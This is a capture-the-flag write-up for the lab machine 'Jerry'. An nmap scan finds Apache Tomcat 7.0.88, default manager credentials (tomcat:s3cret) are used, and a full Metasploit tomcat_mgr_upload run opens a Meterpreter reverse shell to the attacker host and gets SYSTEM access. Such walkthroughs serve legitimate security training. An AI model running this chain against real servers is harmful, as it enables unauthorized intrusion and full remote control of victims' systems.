Jerry

Information Gathering

Port and Services

Nmap scan report for 10.10.10.95
Host is up (0.029s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.84 seconds

Initial Access

https://gist.github.com/0xRar/70aae102af56495b7be51486d363c4bd

tomcat : s3cret

msf6 exploit(multi/http/tomcat_mgr_upload) > options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  s3cret           no        The password for the specified username
   HttpUsername  tomcat           no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.10.10.95      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8080             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.153  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf6 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.14.9:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying gCKIjVy9kOd0w7QUEbf83Foc...
[*] Executing gCKIjVy9kOd0w7QUEbf83Foc...
[*] Undeploying gCKIjVy9kOd0w7QUEbf83Foc ...
[*] Sending stage (58037 bytes) to 10.10.10.95
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.95:49192) at 2025-05-07 13:20:54 +0700

meterpreter > sysinfo
Computer        : JERRY
OS              : Windows Server 2012 R2 6.3 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
meterpreter > whoami
[-] Unknown command: whoami. Run the help command for more details.
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>

PreviousMailing NextMedium

Last updated 7 months ago